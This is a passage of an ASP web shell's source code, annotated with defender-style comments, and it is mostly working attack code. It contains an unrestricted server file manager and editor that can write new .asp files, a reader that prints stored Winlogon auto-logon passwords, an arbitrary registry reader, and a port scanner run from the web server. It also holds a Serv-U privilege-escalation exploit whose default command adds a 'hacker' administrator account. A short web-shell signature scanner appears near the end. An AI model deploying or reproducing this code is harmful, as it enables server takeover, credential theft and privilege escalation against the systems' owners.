' (FileSize) into the script-level request-body stream T1.
Class FIF
dim FileSize,FileStart
Private Sub Class_Initialize
FileSize = 0
FileStart= 0
End Sub
' SaveAs: copies FileSize bytes starting at FileStart from T1 into a new binary stream and
' saves it to the path F with option 2, which overwrites an existing file.
' The return value is True on entry (and when F is blank or FileStart is 0, in which case
' nothing is written) and is set to False after the save has completed.
' F is used as supplied; no restriction on the target path or extension is applied here.
Public function SaveAs(F)
dim T3
SaveAs=true
if trim(F)="" or FileStart=0 then exit function
set T3=CreateObject(ObT(6,0))
T3.Mode=3 : T3.Type=1 : T3.Open
T1.position=FileStart
T1.copyto T3,FileSize
T3.SaveToFile F,2
T3.Close
set T3=nothing
SaveAs=false
end function
End Class
' LBF: file-manager class. CF holds the object created from ObT(0,0)
' ("Scripting.FileSystemObject"); every method acts on the path it is given, and none of
' them restricts that path to the web root.
' Defender note: the copy/move methods receive source and destination in one argument joined
' with "||||"; file and folder names are written into the generated HTML without encoding.
' NOTE(review): the dispatcher that calls these methods is not in the visible part of the file.
Class LBF
Dim CF
Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set CF=Nothing
End Sub
' ShowDriver: writes one ShowFolder link per drive reported by CF.Drives.
Function ShowDriver()
For Each D in CF.Drives
RRS" <a href='javascript:ShowFolder
("""&D.DriveLetter&":\\"")'>本地磁盘 ("&D.DriveLetter&":)</a><br>"
Next
End Function
' Show1File: directory listing for Path. Sub-folders are rendered three per row with
' open / copy / delete / move / download links; files are rendered one per row with
' download / edit / delete / copy / move links plus size (KB), type and last-modified time.
Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
For Each F in FOLD.subfolders
SI=SI&"<td height=10>"
SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&F.Name&"</a>"
SI=SI&" _<a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
SI=SI&" <a href='javascript:FullForm("""&Replace
(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
If i mod 3 = 0 then SI=SI&"</tr><tr>"
Next
SI=SI&"</tr><tr><td height=2></td></tr></table>"
RRS SI &"<hr noshade color=""#CCCCCC"" size=1 color=""#"" />" :
SI=""
For Each L in Fold.files
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
SI=SI&"<tr style='boungroup-color:#'>"
SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath
(Path&"\"&L.Name)&""",""DownFile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='编辑'>编辑</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='复制'>复制</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移动'>移动</a></td>"
SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
SI=SI&"</tr></table>"
RRS SI:SI=""
Next
Set FOLD=Nothing
End function
' DelFile: deletes the file at Path if it exists and prints a confirmation.
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>文件 "&Path&" 删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' EditFile: text editor page.
' - With Action2=Post: creates the text file at Path, writes the posted content field to it
'   and ends the request.
' - Otherwise: loads the file at Path into a textarea; with an empty Path it offers
'   <current folder>\newfile.asp as the name.
' Defender note: this writes request-supplied text to a request-supplied path, so it can
' create or change server-side script files; newfile.asp is the default name to search for.
Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"<Form action='"&URL&"?Action2=Post' method='post'
name='EditForm'>"
SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"
SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"
SI=SI&"<textarea name='Content'
style='width:100%;height:450'>"&Txt&"</textarea><br>"
SI=SI&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
RRS SI
End Function
' CopyFile: Path is "source||||destination"; copies the file when the source exists and the
' destination is not empty.
Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' MoveFile: same argument format as CopyFile; moves the file instead of copying it.
Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' DelFolder: deletes the folder at Path if it exists.
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="<center><br><br><br>目录"&Path&"删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' CopyFolder: Path is "source||||destination"; copies the folder when the source exists and
' the destination is not empty.
Function CopyFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' MoveFolder: same argument format as CopyFolder; moves the folder instead of copying it.
Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' NewFolder: creates the folder at Path when Path is not empty and the folder does not exist.
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="<center><br><br><br>目录"&Path&"新建成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
End Class
' getTerminalInfo: reads two sets of registry values through WScript.Shell.RegRead and prints them:
' - the PortNumber value under the RDP-Tcp WinStation key (terminal services port)
' - AutoAdminLogon, DefaultUserName and DefaultPassword under the Winlogon key
' When AutoAdminLogon is not 0 the stored user name and password are written to the page.
' Defender notes:
' - this is credential access: a DefaultPassword value under Winlogon is readable in clear
'   text by any identity that can read the key, so it should not be left there
' - registry reads happen under the web application's identity; errors are suppressed
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername,
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "终端服务端口及自动登录<hr/><ol>"
' An empty value or any pending error is reported as "cannot read the port, check permissions".
If termPort = "" Or Err.Number <> 0 Then
RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
Else
RRS "当前终端服务端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系统自动登录功能未开启<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自动登录的系统帐户: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
' A failed password read prints "False" before the (then empty) password line.
If Err Then
Err.Clear
RRS "False"
End If
RRS "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
RRS "</ol>"
End Sub
' ReadREG: registry value reader.
' Renders a form whose thePath field is pre-filled with the ComputerName value path, plus a
' hidden span (display:none) listing registry value paths with short descriptions.
' When the request carries thePath, that value is read with WScript.Shell.RegRead and
' printed: each element for an array result, otherwise the single value.
' thePath is used as supplied and the result is written without encoding.
' Defender note: this gives read access to any registry value the web application's identity
' can read; the request field names are theAct and thePath.
sub ReadREG()
RRS "注册表键值读取:<hr/>"
RRS "<form method=post>"
RRS "<input type=hidden value=readReg name=theAct>"
RRS "<input name=thePath
value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " <input type=submit value=' 读取 '>"
RRS "<span id=regeditInfo style='display:none;'><hr/>"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享
}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默认共享}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
RRS
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}
<br/>"
RRS "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网
关}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
RRS "-----------OVER--------------------<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网
卡}<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的
序列(把上面的替换)}<br/>"
RRS "</span>"
RRS "</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "<li>" & theArray(i)
Next
Else
RRS "<li>" & theArray
End If
end if
end sub
' ScanPort: port-scan page.
' Renders a form with an address field (pre-filled with the server's own LOCAL_ADDR) and a
' port list (default 21,23,25,80,110,135,139,445,1433,3389,43958). When the hidden scan
' field is posted, the ip and port fields are split on commas; a "-" inside an entry is
' treated as a range (last octet for addresses, numeric range for ports) and Scan is called
' for every address/port pair. The elapsed time in seconds is printed at the end.
' The script timeout is raised to 7776000 seconds for this page.
' Defender notes:
' - the connections originate from the web server itself, so they can reach hosts that the
'   requesting client cannot reach directly
' - the visible effect on the network is a burst of short-lived outbound connection
'   attempts from the web server to many ports
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"<p>端口扫描器</p>"
RRS"<form name='form1' method='post' action=''
onSubmit='form1.submit.disabled=true;'>"
RRS"<p>Scan IP: "
RRS" <input name='ip' type='text' class='TextBox' id='ip'
value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"<br>Port List:"
RRS"<input name='port' type='text' class='TextBox' size='60'
value='"&PortList&"'>"
RRS"<br><br>"
RRS"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
RRS"<input name='scan' type='hidden' id='scan' value='111'>"
RRS"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("<b>扫描报告:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
' Single address: scan each listed port or port range.
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Else
' Address range: ipStart is everything up to the last dot; the loop start is taken from a
' single character after that dot and the loop end from the text after the "-".
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"<hr>Process in "&thetime&" s"
END IF
end sub
' Scan: probes one address/port pair by opening an ADODB connection through the SQLOLEDB
' provider with Data Source "<targetip>,<portNum>", the fixed user ID lake2, an empty
' password and a 1-second connection timeout. The result is inferred from the error: for
' error numbers -2147217843 or -2147467259, a description containing "(Connect())." is
' reported as 关闭 (closed) and any other description as 开放 (open).
' Defender note: because the probe is a SQL Server login attempt, a real SQL Server that is
' reached this way may record failed logins for the user name lake2 - worth searching for
' in database and Windows security logs.
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","&
portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259
Then
If InStr(Err.description, "(Connect()).") > 0
Then
RRS(targetip & ":" & portNum &
".........关闭<br>")
Else
RRS(targetip & ":" & portNum &
".........<font color=red>开放</font><br>")
End If
End If
End If
End Sub
Select Case Action
Case "MainMenu":MainMenu()
Case "getTerminalInfo":getTerminalInfo()
case "ScanPort":ScanPort()
Case "Servu"
SUaction=request("SUaction")
if not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" &
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" &
vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf &
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" &
vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" &
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='2'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='3'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在提升权限,请等待…………<center>');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
RRS"<input type=button value=' 返回继续 ' onClick=""location.href='?
Action=Servu';"">"
RRS"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"<center><form method='post' name='goldsun'>"
RRS"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
RRS"<tr align='center' valign='middle'>"
RRS"<td colspan='2'>Serv-U 提升权限 漫步云端修改版</td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td width='100'>用户名:</td>"
RRS"<td width='379'><input name='u' type='text' id='u'
value='LocalAdministrator'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>口 令:</td>"
RRS"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@P'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>端 口:</td>"
RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>系统路径:</td>"
RRS" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td>命 令:</td>"
RRS" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td colspan='2'><input type='submit' name='Submit' value='提
交'> "
RRS"<input type='reset' name='Submit2' value='重置'>"
RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
RRS"</tr></table></form></center>"
end select
Function Gpath()
    ' Returns the first two characters of the Windows folder path, lower-cased (for example "c:").
    ' Falls back to "c:" when Err.Number is positive after trying to create the FileSystemObject.
    On Error Resume Next
    Err.Clear
    Set f = Server.CreateObject("Scripting.FileSystemObject")
    If Err.Number > 0 Then
        Gpath = "c:"
    Else
        ' Special folder 0 is the Windows folder.
        Gpath = f.GetSpecialFolder(0)
        Gpath = LCase(Left(Gpath, 2))
        Set f = Nothing
    End If
End Function
Case "kmuma"
' "kmuma" action: scans a directory tree for ASP web-shell indicators, or searches files by date,
' extension and content. Without act=scan in the query string only the form below is rendered.
dim Report
if request.QueryString("act")<>"scan" then
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form action=""?Action=kmuma&act=scan""
method=""post"" name=""form1"">"
RRS "<p><b>填入你要检查的路径:</b>"
RRS "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
RRS "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 马"
RRS "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合条件之文件<br>"
RRS "<br /><div id=""showFile1""
style=""display:none"">"
RRS " 查找内容:<input
name=""Search_Content"" type=""text"" id=""Search_Content""
style=""border:1px solid #999"" size=""20"">"
RRS " 要查找的字符串,不填就只进行日期检查<br />"
RRS " 修改日期:<input name=""Search_Date""
type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
RRS " 文件类型:<input
name=""Search_FileExt"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
RRS "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
RRS "</form>"
else
' act=scan: the path comes from the POSTed "path" field. "\" and "." map to the site root and the
' script directory; any other value is used as given, so this code does not confine the walk to the web root.
if request.Form("path")="" then
RRS("路径不能为空")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
' Counters shared with the scan routines: Sun = findings, SumFiles = files checked, SumFolders = folders visited.
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
' "sws" runs the signature scan over asp/cer/asa/cdx files; the other mode requires a date and an
' extension list and calls the search routine instead.
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form
("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
RRS "<tr><th>Scan WebShell -- 漫步云端修改版</tr>"
RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
RRS "扫描完毕!一共检查文件夹<font
color=""#FF0000"">"&SumFolders&"</font>个,文件<font
color=""#FF0000"">"&SumFiles&"</font>个,发现可疑点<font
color=""#FF0000"">"&Sun&"</font>个"
RRS "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
If request.Form("radiobutton") = "sws" Then
RRS "<td width=""20%"">文件相对路径</td>"
RRS "<td width=""20%"">特征码</td>"
RRS "<td width=""40%"">描述</td>"
RRS "<td width=""20%"">创建/修改时间</td>"
else
RRS "<td width=""50%"">文件相对路径</td>"
RRS "<td width=""25%"">文件创建时间</td>"
RRS "<td width=""25%"">修改时间</td>"
end if
RRS "</tr>"
' Report holds the HTML rows accumulated by the scan routines.
RRS Report
RRS "<br/></table>"
' Elapsed time shown to the operator, derived from the two Timer readings.
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
Sub ShowAllFile(Path)
    ' Recursively walks Path: every file whose extension passes CheckExt is handed to ScanFile,
    ' then each subfolder is visited. SumFiles and SumFolders are the shared progress counters.
    Set F1SO = CreateObject("Scripting.FileSystemObject")
    If F1SO.FolderExists(Path) Then
        Set f = F1SO.GetFolder(Path)
        Set fc2 = f.files
        For Each myfile In fc2
            If CheckExt(F1SO.GetExtensionName(Path & "\" & myfile.name)) Then
                ' Temp is not assigned in this Sub; it is concatenated exactly as the original does.
                ScanFile Path & Temp & "\" & myfile.name, ""
                SumFiles = SumFiles + 1
            End If
        Next
        Set fc = f.SubFolders
        For Each f1 In fc
            Call ShowAllFile(Path & "\" & f1.name)
            SumFolders = SumFolders + 1
        Next
        Set F1SO = Nothing
    End If
End Sub
Sub ScanFile(FilePath, InFile)
' Reads FilePath as text, lower-cases it and appends one row to Report per matched heuristic,
' incrementing Sun each time. InFile, when non-empty, names the file whose include/execute
' reference led here and is shown in the row.
' Heuristics visible below: WScript.Shell and Shell.Application by ProgID or CLSID, encoded
' script blocks, Eval, Execute, FSO text-file access, SaveToFile, .Save, and CreateObject calls
' whose argument is not a single plain string literal.
' NOTE(review): the search strings are split ("Ev"&"al", &DoMyBest&), presumably so that this
' file does not itself contain the literals it looks for; DoMyBest is not defined in this part.
' Defender note: these are broad indicators; the Eval row itself states it may be a false positive.
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "<font color=red>该文件被<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(InFile)&""" target=_blank>"& InFile & "</a>文件包含执行</font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
' Errors from here on are suppressed; a failed open or read leaves the Sub through the Err check below.
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
' temp is the first table cell: a link to the file relative to the site root plus
' edit/delete/copy/move links that call the page's FullForm() helper.
temp = "<a href=""http://"&Request.Servervariables
("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
